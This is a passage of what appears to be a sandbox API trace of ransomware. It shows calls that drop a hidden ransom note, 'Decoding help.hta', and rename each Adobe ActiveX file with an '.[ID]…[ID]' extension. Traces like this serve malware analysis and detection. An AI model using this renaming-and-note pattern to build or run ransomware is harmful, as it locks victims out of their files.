(lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.372] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.373] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.373] CloseHandle (hObject=0xffffffff) returned 0 [0046.373] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.373] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.CHT") returned 1 [0046.373] lstrlenW (lpString="AcroPDF.CHT") returned 11 [0046.373] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.373] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.373] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.CHT" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHT") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHT" [0046.373] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHT" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHT") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHT" [0046.373] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHT", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHT.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHT.[ID]g9uZrLhJaygpwRm1[ID]" [0046.373] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHT" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.cht"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHT.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.cht.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.373] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d95e8c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.CZE", cAlternateFileName="")) returned 1 [0046.373] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.373] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.373] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.373] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.373] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.374] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.374] CloseHandle (hObject=0xffffffff) returned 0 [0046.374] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.374] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.CZE") returned 1 [0046.374] lstrlenW (lpString="AcroPDF.CZE") returned 11 [0046.374] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.374] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.374] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.CZE" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CZE") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CZE" [0046.374] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CZE" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CZE") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CZE" [0046.374] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CZE", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CZE.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CZE.[ID]g9uZrLhJaygpwRm1[ID]" [0046.374] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CZE" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.cze"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CZE.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.cze.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.374] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d8ec4a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.DAN", cAlternateFileName="")) returned 1 [0046.374] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.374] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.374] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.374] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.374] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.375] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.375] CloseHandle (hObject=0xffffffff) returned 0 [0046.375] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.375] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.DAN") returned 1 [0046.375] lstrlenW (lpString="AcroPDF.DAN") returned 11 [0046.375] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.375] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.375] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.DAN" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DAN") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DAN" [0046.375] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DAN" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DAN") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DAN" [0046.375] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DAN", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DAN.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DAN.[ID]g9uZrLhJaygpwRm1[ID]" [0046.375] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DAN" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.dan"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DAN.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.dan.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.375] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d8ec4a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.DEU", cAlternateFileName="")) returned 1 [0046.375] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.375] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.375] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.375] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.375] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.376] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.376] CloseHandle (hObject=0xffffffff) returned 0 [0046.376] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.376] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.DEU") returned 1 [0046.376] lstrlenW (lpString="AcroPDF.DEU") returned 11 [0046.376] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.376] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.376] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.DEU" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DEU") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DEU" [0046.376] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DEU" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DEU") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DEU" [0046.376] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DEU", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DEU.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DEU.[ID]g9uZrLhJaygpwRm1[ID]" [0046.376] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DEU" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.deu"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DEU.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.deu.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.376] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d912600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xab790, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.dll", cAlternateFileName="")) returned 1 [0046.376] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.376] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.376] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.376] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.376] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.376] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.377] CloseHandle (hObject=0xffffffff) returned 0 [0046.377] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.377] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.dll") returned 1 [0046.377] lstrlenW (lpString="AcroPDF.dll") returned 11 [0046.377] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.377] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.377] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.dll" [0046.377] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.dll" [0046.377] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0046.377] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.dll" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.377] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d8ec4a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.ESP", cAlternateFileName="")) returned 1 [0046.377] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.377] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.377] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.377] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.377] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.377] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.377] CloseHandle (hObject=0xffffffff) returned 0 [0046.378] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.378] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.ESP") returned 1 [0046.378] lstrlenW (lpString="AcroPDF.ESP") returned 11 [0046.378] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.378] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.378] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.ESP" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ESP") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ESP" [0046.378] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ESP" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common 